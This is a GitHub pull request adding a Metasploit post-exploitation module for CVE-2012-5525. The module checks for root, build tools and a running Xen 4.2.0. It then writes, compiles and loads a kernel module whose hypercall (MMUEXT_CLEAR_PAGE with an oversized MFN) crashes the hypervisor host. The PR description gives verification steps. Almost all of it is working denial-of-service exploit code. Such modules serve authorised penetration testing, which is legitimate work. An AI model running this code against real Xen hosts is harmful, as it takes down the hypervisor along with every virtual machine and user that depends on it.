### PR TITLE
Linux DoS Xen 4.2.0 2012-5525

### DIFF
--- a/modules/post/linux/dos/xen_420_dos.rb
+++ b/modules/post/linux/dos/xen_420_dos.rb
@@ -1,0 +1,300 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info={})
+    super(update_info(info,
+                      'Name'          => 'Linux DoS Xen 4.2.0 2012-5525',
+                      'Description'   => %q{
+                      This module denials the Service of Xen 4.2.0 via a paravirtualised VM (dom0 included). Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0 compiled from source. Also checking requirements before executing.},
+                      'References'     =>
+                      [
+                      ['CVE', '2012-5525']
+                      ],
+                      'License'       => MSF_LICENSE,
+                      'Author'        => [ 'Christoph Sendner <christoph.sendner[at]stud-mail.uni-wuerzburg.de>',
+                                           'Aleksandar Milenkoski  <aleksandar.milenkoski[at]uni-wuerzburg.de>'],
+                      'Platform'      => [ 'linux' ],
+                      'Arch'          => [ARCH_X86_64],
+                      'Targets'       =>
+                      [
+                      ['Linux x86_64', {'Arch' => ARCH_X86_64}]
+                      ],
+                      'SessionTypes'  => ['shell']
+                      ))
+
+                      register_options([
+                                       OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
+                                       ], self.class)
+  end
+
+  def run
+    # Variables
+    @rand_folder = '/' + Rex::Text.rand_text_alpha(7 + rand(5)).to_s
+    @writeable_folder = datastore['WritableDir'].to_s + @rand_folder
+
+    # Testing requirements
+    print_status('Detecting requirements...')
+    return unless requirements?
+
+    # Cearting and writing random paths and files
+    print_status('Creating random file- and foldernames')
+    write_files
+
+    # Execute make and insmod
+    do_insmod
+
+    # Testing success of DoS
+    test_success
+  end
+
+  ##
+  # Test all requirements:
+  #  - root-priviliges
+  #  - build-essentials
+  #  - xen-enviroment (existing, not running)
+  #  - xen-running
+  #  - xen-version (DoS only works on specific versions)
+  ##
+
+  def requirements?
+    unless is_root?
+      print_error("Sorry, you're not root - abort")
+      return false
+    end
+    print_good('Detected root privilege')
+
+    unless build_essential?
+      print_error('Sorry, no build-essential found - abort')
+      return false
+    end
+    print_good('Detected build-essential')
+
+    unless xen?
+      print_error('Sorry, no Xen found - abort')
+      return false
+    end
+    print_good('Detected Xen')
+
+    unless xen_running?
+      print_error('Sorry, Xen not running - abort')
+      return false
+    end
+    print_good('Detected running Xen')
+
+    unless right_xen_version?
+      print_error('Sorry, wrong Xen Version - abort')
+      return false
+    end
+    print_good('Detected right Xen Version')
+
+    true
+  end
+
+  ##
+  # Checks for build essentials
+  #  - Required for building a lkm
+  #  - checks for gcc/g++, make and linux-headers
+  #  - commands sh-conform
+  ##
+
+  def build_essential?
+    build_essential = false
+
+    check_command = 'if [ -s $( which gcc ) ] && '
+    check_command << '[ -s $( which g++ ) ] && '
+    check_command << '[ -s $( which make ) ] && '
+    check_command << '[ "$( dpkg -l | grep linux-headers-$(uname -r) )" != "" ] ;'
+    check_command << 'then echo OK;'
+    check_command << 'fi'
+
+    output_command = cmd_exec(check_command).delete("\r")
+
+    build_essential = true if output_command['OK'] == 'OK'
+
+    build_essential
+  end
+
+  ##
+  # Checks for running Xen Hypervisor
+  #  - Looks for Xen in lsmod, lscpu, dmesg and /sys/bus
+  #  - commands sh-conform
+  ##
+
+  def xen?
+    xen = false
+
+    check_command = 'if [ "$( lsmod | grep xen )" != "" ] || '
+    check_command << '[ "$( lscpu | grep Xen )" != "" ] || '
+    check_command << '[ "$( dmesg | grep xen )" != "" ] || '
+    check_command << '[ "$( which xl )" != "" ] ;'
+    check_command << 'then echo OK;'
+    check_command << 'fi'
+
+    output_command = cmd_exec(check_command).delete("\r")
+
+    xen = true if output_command['OK'] == 'OK'
+
+    xen
+  end
+
+  ##
+  # Checks for running Xen
+  #  - Host eventually has Xen installed, but not running
+  #  - DoS needs a running Xen on Host
+  ##
+
+  def xen_running?
+    xen_running = false
+
+    check_command = 'if [ -f /var/run/xenstored.pid ] ; '
+    check_command << 'then echo OK;'
+    check_command << 'fi'
+
+    output_command = cmd_exec(check_command).delete("\r")
+
+    xen_running = true if output_command['OK'] == 'OK'
+
+    xen_running
+  end
+
+  ##
+  # Checks for Xen Version
+  #  - Most DoS of Xen require a specific version - here: 4.2.0
+  #  - commands need running Xen - so execute after test for xen
+  ##
+
+  def right_xen_version?
+    cmd_major = "xl info | grep xen_major | grep -o '[0-9]*'"
+    xen_major = cmd_exec(cmd_major).delete("\r")
+    cmd_minor = "xl info | grep xen_minor | grep -o '[0-9]*'"
+    xen_minor = cmd_exec(cmd_minor).delete("\r")
+    cmd_extra = "xl info | grep xen_extra | grep -o '[0-9]*'"
+    xen_extra = cmd_exec(cmd_extra).delete("\r")
+
+    xen_version = xen_major + '.' + xen_minor + '.' + xen_extra
+
+    print_status('Xen Version: ' + xen_version)
+
+    right_xen_version = true if xen_version == '4.2.0'
+
+    right_xen_version
+  end
+
+  ##
+  # Creating and writing files:
+  #  - c_file for c-code
+  #  - Makefile
+  ##
+
+  def write_files
+    @c_name = Rex::Text.rand_text_alpha(7 + rand(5)).to_s
+    @c_file = "#{@writeable_folder}/#{@c_name}.c"
+    @make_file = "#{@writeable_folder}/Makefile"
+
+    print_status("Creat folder '#{@writeable_folder}'")
+    cmd_exec("mkdir #{@writeable_folder}")
+
+    print_status("Writing c code to '#{@c_file}'")
+    write_file(@c_file, c_code)
+    print_status("Writing Makefile to '#{@make_file}'")
+    write_file(@make_file, make_code)
+  end
+
+  ##
+  # Compiling and execute LKM
+  ##
+
+  def do_insmod
+    cmd_exec("cd #{@writeable_folder}")
+    print_status('Making modul...')
+    cmd_exec('make')
+    print_status("Insmod '#{@writeable_folder}/#{@c_name}.ko'")
+    cmd_exec("insmod #{@writeable_folder}/#{@c_name}.ko")
+  end
+
+  ##
+  # Test for success via ssh-error exception
+  #  - Host down => ssh-error => DoS successful
+  ##
+
+  def test_success
+    successful = false
+    begin
+      is_root?
+    rescue RuntimeError => e
+      successful = true if e.message == 'Could not determine UID: ""'
+      raise unless successful
+    ensure
+      if successful
+        print_good('DoS was successful!')
+      else
+        print_error('DoS has failed')
+      end
+    end
+  end
+
+  ##
+  # Returns Makefile to compile
+  #  - LKMs need a Makefile
+  #  - Needs the linux-headers, make and gcc
+  ##
+
+  def make_code
+    m = <<-END
+obj-m := #{@c_name}.o
+
+EXTRA_CFLAGS+= -save-temps
+
+all:
+\t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+\t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+    END
+    m
+  end
+
+  ##
+  # Returns the c-Code to compile
+  #  - Contains the essential bug to crash Xen
+  #  - Here: Force a segmentation fault via hypercall, which crashes the host
+  ##
+
+  def c_code
+    c = <<-END
+#undef __KERNEL__
+#define __KERNEL__
+#undef MODULE
+#define MODULE
+#include <linux/module.h>
+#include <asm/xen/hypercall.h>
+MODULE_LICENSE("GPL");
+static int __init lkm_init(void)
+{
+struct mmuext_op op;
+int status;
+op.cmd = 16; /*MMUEXT_CLEAR_PAGE*/
+op.arg1.mfn = 0x0EEEEE; /*A large enough MFN*/
+HYPERVISOR_mmuext_op(&op, 1, &status, DOMID_SELF);
+return 0;
+}
+static void __exit lkm_cleanup(void)
+{
+}
+module_init(lkm_init);
+module_exit(lkm_cleanup);
+    END
+    c
+  end
+end

--- a/modules/post/linux/dos/xen_420_dos.rb
+++ b/modules/post/linux/dos/xen_420_dos.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Post
     super(update_info(info,
                       'Name'          => 'Linux DoS Xen 4.2.0 2012-5525',
                       'Description'   => %q{
-                      This module denials the Service of Xen 4.2.0 via a paravirtualised VM (dom0 included). Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0 compiled from source. Also checking requirements before executing.},
+                      This module denies the service of Xen 4.2.0 via a paravirtualised VM (dom0 included). Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0 compiled from source. Also checking requirements before executing.},
                       'References'     =>
                       [
                       ['CVE', '2012-5525']


### PR DESCRIPTION
Attacking the Xen hypervisor (or others, like KVM) is mostly done by hand. So the goal was to automate those attacks by using the Metasploit-Framework with its rich API. Due to the lack of examples, this module for DoS inherits from Msf::Post (normally DoS-modules seem to inherit Msf::Auxiliary), so that the API for sessions, writing files and executing commands is available.
The module basically embeds the C-code and a Makefile for a malicious LKM, tests the requirements, uploads the files and inserts the LKM.
It specifically denies the service of Xen 4.2.0 via a paravirtualised VM (dom0 included) by crashing the host. It was successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0 compiled from source.
## Verification:
- [x] install Debian 7 on remote host
- [x] download sources for Xen 4.2.0 
- [x] configure, make and install ( [compiling Xen form source](http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source) )
- [x] linux-headers need to exist on remote host
- [x] reboot remote host with Xen
- [x] start ssh-session to the remote host through metasploit with root-privileges
- [x] use post/linux/dos/xen_420_dos
- [x] set session
- [x] run

NOTE: Works on dom0 (just the host with no VMs). It also works on a running VM, but the setup takes more time.

Successful execution with Debian 7 3.2.0-4-amd64 and Xen 4.2.0:
![debian79withxen](https://cloud.githubusercontent.com/assets/9351564/14480498/f9d46b72-0129-11e6-9cbf-7160247894b8.png)
## Example Outputs:

Run on host with Debian 8 and Xen 4.6.1:
![debian8-4withxen](https://cloud.githubusercontent.com/assets/9351564/14480933/26a10df0-012e-11e6-8842-f23524614c56.png)

Run on host with Ubuntu 14.04 as VirtualBox VM:
![ubuntu1404virtualbox](https://cloud.githubusercontent.com/assets/9351564/14480938/315a4ad6-012e-11e6-8e8a-a220e7653f5c.png)

Run on host with Debian 7 and Xen 4.2.0 (not running):
![debian79withoutxen](https://cloud.githubusercontent.com/assets/9351564/14480940/3c6bd048-012e-11e6-9a96-597ed6fdb58d.png)
